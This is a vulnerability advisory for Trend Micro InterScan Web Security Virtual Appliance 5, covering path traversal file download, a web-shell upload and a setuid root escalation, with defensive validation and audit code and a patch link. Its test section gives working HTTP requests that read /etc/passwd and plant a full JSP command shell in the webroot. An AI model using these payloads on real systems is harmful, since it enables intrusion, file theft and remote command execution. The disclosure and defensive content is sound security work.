InterScan Web Security Virtual Appliance Local Privilege Escalation and Arbitrary File Upload/Download Vulnerabilities

Affected systems:

Trend Micro InterScan Web Security Virtual Appliance 5

Description:


BUGTRAQ ID: 41072

InterScan Web Security Virtual Appliance is a web filtering product that can be installed on the VMware platform.

InterScan Web Security Virtual Appliance does not properly filter the exportname parameter submitted to /servlet/com.trend.iwss.gui.servlet.exportreport or the pkg_name parameter submitted to /servlet/com.trend.iwss.gui.servlet.ConfigBackup; a remote attacker can download arbitrary files from the system through directory traversal.

The com.trend.iwss.gui.servlet.XMLRPCcert servlet of InterScan Web Security Virtual Appliance does not properly perform security checks and allows users to upload files with arbitrary extensions. If a specially crafted JSP script containing a web shell is uploaded, arbitrary commands can be executed; in addition, users can change the original destination path through directory traversal.
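The two input-handling defects above (a user-controlled path read back by exportreport and ConfigBackup, and a user-controlled filename written to disk by XMLRPCcert) share one remedy: decode the input once, canonicalize it, and prove that the result stays inside the directory the endpoint is meant to serve, then allow-list the extension for uploads. The Python below is an added example of such checks, not Trend Micro's code; the directory names and the allowed-extension list are assumptions, and the sample inputs are the parameter values quoted in the test method further down.

```python
"""
Server-side input checks for a "download a named file" endpoint and an
"upload a named file" endpoint.  Added example, not the advisory's or the
vendor's code.  Directory names and the extension allow-list are assumed.
"""
import posixpath
import re
import urllib.parse

# Assumed locations; the appliance's real layout is not documented here.
REPORT_EXPORT_DIR = "/var/iwss/reports"
CERT_IMPORT_DIR = "/var/iwss/certs"

# Extensions a CA-import endpoint has any business accepting (assumed list).
ALLOWED_UPLOAD_EXT = {".pem", ".crt", ".cer", ".key"}

# CR, LF, NUL and friends: the pkg_name=/etc/passwd%0D%0A trick relies on these.
_CONTROL_CHARS = re.compile(r"[\x00-\x1f\x7f]")


class UnsafePathError(ValueError):
    """Raised when user input would escape the intended directory."""


def resolve_under_root(root: str, user_path: str) -> str:
    """Join a user-supplied relative path onto root and prove the result stays
    inside root.  Percent-decoding happens exactly once, before any check, so
    %2e%2e or %0D%0A cannot hide from the filters; the final test is on the
    normalized absolute path, not on the raw string.  (A production version
    should additionally compare os.path.realpath() results once the file
    exists, so symlinks inside root cannot point elsewhere.)"""
    decoded = urllib.parse.unquote(user_path)
    if not decoded:
        raise UnsafePathError("empty path")
    if _CONTROL_CHARS.search(decoded):
        raise UnsafePathError("control character in path")
    if posixpath.isabs(decoded):
        raise UnsafePathError("absolute path not allowed")
    root_norm = posixpath.normpath(root)
    candidate = posixpath.normpath(posixpath.join(root_norm, decoded))
    # Compare with a trailing separator so "/var/iwss/reports2" does not pass.
    if candidate != root_norm and not candidate.startswith(root_norm + "/"):
        raise UnsafePathError("path escapes root")
    return candidate


def sanitize_upload_name(filename: str) -> str:
    """Reduce a multipart filename to a bare name for storage under
    CERT_IMPORT_DIR.  Directory components (both '/' and '\\') are discarded,
    control characters are rejected, and the extension must be allow-listed,
    so a filename such as ../../usr/.../webapps/ROOT/cmd.jsp loses its
    traversal prefix and is then refused for its .jsp extension."""
    name = urllib.parse.unquote(filename).replace("\\", "/").rsplit("/", 1)[-1]
    if not name or name in (".", "..") or _CONTROL_CHARS.search(name):
        raise UnsafePathError("invalid upload filename")
    ext = posixpath.splitext(name)[1].lower()
    if ext not in ALLOWED_UPLOAD_EXT:
        raise UnsafePathError(f"extension {ext!r} not permitted")
    return name


def classify(kind: str, value: str) -> str:
    """Return 'accepted' or 'rejected: <reason>' for one input of the given
    kind ('download' for exportname/pkg_name, 'upload' for a part filename)."""
    try:
        if kind == "download":
            resolve_under_root(REPORT_EXPORT_DIR, value)
        else:
            sanitize_upload_name(value)
        return "accepted"
    except UnsafePathError as exc:
        return f"rejected: {exc}"


if __name__ == "__main__":
    # Constructed sample set: the advisory's own payloads plus two benign values.
    samples = [
        ("download", "../../../../../../../../../../etc/passwd"),
        ("download", "/etc/passwd%0D%0A"),
        ("download", "weekly_summary.csv"),
        ("upload", "../../../../../../../../../../../../../../../../../usr/iwss/AdminUI/tomcat/webapps/ROOT/cmd.jsp"),
        ("upload", "ca-root.pem"),
    ]
    for kind, value in samples:
        print(f"{kind:8} {value[:48]:50} -> {classify(kind, value)}")
```

The order of checks matters: decoding first means a filter cannot be bypassed by encoding, and testing the normalized result rather than searching for "../" means tricks such as "....//" or mixed separators are handled by the same rule.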

The uihelper shell in InterScan Web Security Virtual Appliance has the suid bit set; a local user can execute commands with root privileges simply by running $ /usr/iwss/AdminUi/uihelper whoami.
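For the setuid finding, the check an administrator wants after patching is an inventory of every set-user-ID or set-group-ID file under the product tree, so that uihelper (and any similar helper) can be confirmed to have lost the bit. The Python below is an added audit example, not part of the advisory or of Trend Micro's tooling; the directory it is pointed at is an assumption, and it reports rather than changes anything.

```python
"""
Enumerate set-user-ID / set-group-ID files under a directory tree and pick
out the root-owned setuid ones, which run as root for anyone able to execute
them.  Added example; the default root directory is an assumption.
"""
import os
import stat
from typing import List, Tuple

# Assumed product directory; adjust to the installation being audited.
DEFAULT_ROOT = "/usr/iwss"


def is_setid_mode(mode: int) -> bool:
    """True when either the setuid or the setgid bit is present in mode."""
    return bool(mode & (stat.S_ISUID | stat.S_ISGID))


def find_setid_files(root: str) -> List[Tuple[str, int, str]]:
    """Walk root and return (path, owner uid, octal mode string) for every
    regular file with S_ISUID or S_ISGID set.  Symlinks are examined with
    lstat and not followed, so a link into /bin cannot produce a false hit."""
    hits = []
    for dirpath, _dirnames, filenames in os.walk(root):
        for name in filenames:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)
            except OSError:
                continue  # vanished or unreadable: skip rather than abort the audit
            if not stat.S_ISREG(st.st_mode):
                continue
            if is_setid_mode(st.st_mode):
                hits.append((path, st.st_uid, oct(stat.S_IMODE(st.st_mode))))
    return sorted(hits)


def root_owned_setuid(root: str) -> List[str]:
    """The dangerous subset: files owned by uid 0 that carry the setuid bit."""
    return [path for path, uid, mode in find_setid_files(root)
            if uid == 0 and int(mode, 8) & stat.S_ISUID]


if __name__ == "__main__":
    import sys
    target = sys.argv[1] if len(sys.argv) > 1 else DEFAULT_ROOT
    for path, uid, mode in find_setid_files(target):
        print(f"{mode} uid={uid} {path}")
    dangerous = root_owned_setuid(target)
    print(f"{len(dangerous)} root-owned setuid file(s) under {target}")
```

Run it before and after applying the vendor patch; any root-owned setuid helper that survives and accepts a command name as an argument deserves the same scrutiny as uihelper.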

<*Source: Ivan Huertas
  
  Links: http://secunia.com/advisories/40328/
        http://marc.info/?l=full-disclosure&m=127730641328283&q=p5
        http://marc.info/?l=full-disclosure&m=127730618427877&q=p5
        http://marc.info/?l=full-disclosure&m=127730628828036&q=p5
        http://www.trendmicro.com/ftp/documentation/readme/iwsva_50_ar64_en_cp1386_readme.txt
*>

Test method:


Warning

The following programs (methods) may be offensive in nature and are provided for security research and teaching purposes only. Use at your own risk!

POST /servlet/com.trend.iwss.gui.servlet.exportreport HTTP/1.1
Host: xxx.xxx.xx.xx:1812
User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.8) Gecko/20100214 Ubuntu/9.10 (karmic) Firefox/3.5.8
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Proxy-Connection: keep-alive
Referer: http://xxx.xxx.xx.xx:1812/summary_threat.jsp
Cookie: JSESSIONID=D122F55EA4D2A5FA1E7AE4582085F370
Content-Type: application/x-www-form-urlencoded
Content-Length: 99

op=refresh&summaryinterval=7&exportname=../../../../../../../../../../etc/passwd&exportfilesize=443

POST /servlet/com.trend.iwss.gui.servlet.ConfigBackup?action=download HTTP/1.1
Host: xx.xx.xx.xx:1812
User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.8) Gecko/20100214 Ubuntu/9.10 (karmic) Firefox/3.5.8
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Proxy-Connection: keep-alive
Referer: http://xx.xx.xx.xx:1812/config_backup_result.jsp?op=export
Cookie: JSESSIONID=D122F55EA4D2A5FA1E7AE4582085F370
Content-Type: application/x-www-form-urlencoded
Content-Length: 46

op=2&ImEx_success=1&pkg_name=/etc/passwd%0D%0A

POST /servlet/com.trend.iwss.gui.servlet.XMLRPCcert?action=import HTTP/1.1
Host: xx.xx.xx.xx:1812
User-Agent: Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.8) Gecko/20100214 Ubuntu/9.10 (karmic) Firefox/3.5.8
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Proxy-Connection: keep-alive
Referer: http://xx.xx.xx.xx:1812
Cookie: JSESSIONID=9072F5BC86BD450CFD8B88613FFD2F80
Content-Type: multipart/form-data; boundary=---------------------------80377104394420410598722900
Content-Length: 2912

-----------------------------80377104394420410598722900
Content-Disposition: form-data; name="op"

save
-----------------------------80377104394420410598722900
Content-Disposition: form-data; name="defaultca"

yes
-----------------------------80377104394420410598722900
Content-Disposition: form-data; name="importca_certificate"; filename="../../../../../../../../../../../../../../../../../usr/iwss/AdminUI/tomcat/webapps/ROOT/cmd.jsp"
Content-Type: application/octet-stream

<%@ page import="java.util.*,java.io.*"%>
<%%>
<HTML><BODY>
<FORM METHOD="GET" NAME="myform" ACTION="">
<INPUT TYPE="text" NAME="cmd">
<INPUT TYPE="submit" VALUE="Send">
</FORM>
<pre>
<%
if (request.getParameter("cmd") != null) {
        out.println("Command: " + request.getParameter("cmd") + "<BR>");
        Process p = Runtime.getRuntime().exec(request.getParameter("cmd"));
        OutputStream os = p.getOutputStream();
        InputStream in = p.getInputStream();
        DataInputStream dis = new DataInputStream(in);
        String disr = dis.readLine();
        while ( disr != null ) {
                out.println(disr);
                disr = dis.readLine();
                }
        }
%>
</pre>
</BODY></HTML>
-----------------------------80377104394420410598722900
Content-Disposition: form-data; name="importca_key"; filename="../../../../../../../../../../../../../../../../../usr/iwss/AdminUI/tomcat/webapps/ROOT/cmd.jsp"

<%@ page import="java.util.*,java.io.*"%>
<%%>
<HTML><BODY>
<FORM METHOD="GET" NAME="myform" ACTION="">
<INPUT TYPE="text" NAME="cmd">
<INPUT TYPE="submit" VALUE="Send">
</FORM>
<pre>
<%
if (request.getParameter("cmd") != null) {
        out.println("Command: " + request.getParameter("cmd") + "<BR>");
        Process p = Runtime.getRuntime().exec(request.getParameter("cmd"));
        OutputStream os = p.getOutputStream();
        InputStream in = p.getInputStream();
        DataInputStream dis = new DataInputStream(in);
        String disr = dis.readLine();
        while ( disr != null ) {
                out.println(disr);
                disr = dis.readLine();
                }
        }
%>
</pre>
</BODY></HTML>
-----------------------------80377104394420410598722900
Content-Disposition: form-data; name="importca_passphrase"

test
-----------------------------80377104394420410598722900
Content-Disposition: form-data; name="importca_2passphrase"

test
-----------------------------80377104394420410598722900
Content-Disposition: form-data; name="beErrMsg"

imperr
-----------------------------80377104394420410598722900--

Recommendations:


Vendor patch:

Trend Micro
-----------
The vendor has released an upgrade patch to fix this security issue; please download it from the vendor's home page:

http://downloadcenter.trendmicro.com/index.php?clk=tbl&clkval=249&regs=NABU&lang_loc=1
